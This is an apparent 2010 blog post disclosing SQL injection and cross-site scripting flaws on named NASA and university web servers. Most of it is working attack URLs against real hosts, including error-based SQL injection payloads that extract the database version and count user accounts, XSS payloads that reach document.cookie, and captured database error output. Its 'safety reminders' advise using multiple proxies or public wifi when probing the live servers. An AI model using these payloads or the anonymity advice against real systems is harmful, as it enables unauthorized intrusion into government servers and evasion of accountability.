Thursday, February 25, 2010

NASA Servers "0-day" Vulnerabilities

After a series of SQL vulnerabilities last December 2009, the NASA website is on the security limelight again with another set of server vulnerabilities. I am aware that the agency itself has had budget issues lately and added the fact that they have a lot of servers to maintain on a daily basis, may have contributed to such negligence. However, all that should not be used as an excuse for the security oversight. After all, prevention such as input validation should not cost a single cent right?



Cross-Site Scripting / SQL :

http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&node=0&instnname=0′AND+1/0;–&Submit=Search

Following error is giving some precious information (I mean many times it is returning different IP address in “Remote Address”. These IP addresses can be of other error generating remote clients, there might be some serious flaw:

http://www-pds.jpl.nasa.gov/tools/search.jsp?q=NOT
http://www-pds.jpl.nasa.gov/tools/text-search/results.jsp?query=%22
http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=OR
http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=”
etc.

Check these results of this Error based SQL injection:
http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&node=1′%22;/*&instnname=-1;–&Submit=Search
http://www-pds.jpl.nasa.gov/tools/ddlookup/data_dictionary_lookup.cfm?type=element&q=NOT&genclasstype=0′&sysclassid=0

http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&node=1&instnname=%27%29+OR+1=0+OR+57=rand%28convert%28%27NUMERIC,%27||%28select+@@version%29%29%252b900000000000000000000000%29–&Submit=Search
http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&node=1&instnname=’)+OR+1=0+OR+57=rand(convert(‘NUMERIC,’||(select+@@version))%252b900000000000000000000000)–&Submit=Search
————————————————————————————————————————————————–
Error Executing Database Query.
Syntax error during explicit conversion of VARCHAR value ‘ Adaptive Server Enterprise/12.5.1/EBF 11429/P/Linux Intel/Enterprise Linux/ase1251/1823/32-bit/OPT/Tue Sep 16 23:43:54 2003′ to a NUMERIC field.

http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=&phase=&progyr=99&st=&center=&firm=’select+@@version–’&sort=&sort2=&rec_per_page=1&cur_page=-2&start_page=-9999

http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=SBIR&phase=&progyr=99st=center=firm=SBIR’or+1=utl_inaddr.get_host_address((select+concat(‘A’,count(username))+from+all_users))–’&sort=null&sort2=null&rec_per_page=100&cur_page=1&start_page=1

http://e4eil01u.ecs.nasa.gov:22000/WebAccess/drill?attrib=home%3Cscript%3Ealert(‘XSS–vinnu’)%3C/script%3E&next=group

http://www.igpp.ucla.edu/cgi-bin/ditdos?filter=GOPR_2001,HAL_,DS1_PEPE,DSPE&title=Comet
————————————————————————————————————————————————
http://directreadout.sci.gsfc.nasa.gov/index.cfm?section=home%22%3E%3Cscript%3Ealert(‘XSS–%5C%22vinnu%5C%22′)%3C/scrip
t%3E&page=news
http://ssd.jpl.nasa.gov/sbdb_help.cgi?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


Safety Reminders :

1. The information above are for educational purposes only and should not be used for illegal purposes such as defacing, information theft, espionage, and the like.
2. Most of the vulnerabilities above are not yet fixed by NASA, so take extra precaution if you have to check the live servers yourself such as using multiple proxies or simply use public internet access such as a "wifi hotspot".
3. I have tried to notify the people in charge via email before posting these vulnerabilities but no reply from them until now for 2 weeks already.
4. Credits to Lox and Vinay.

No comments:

Post a Comment

Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security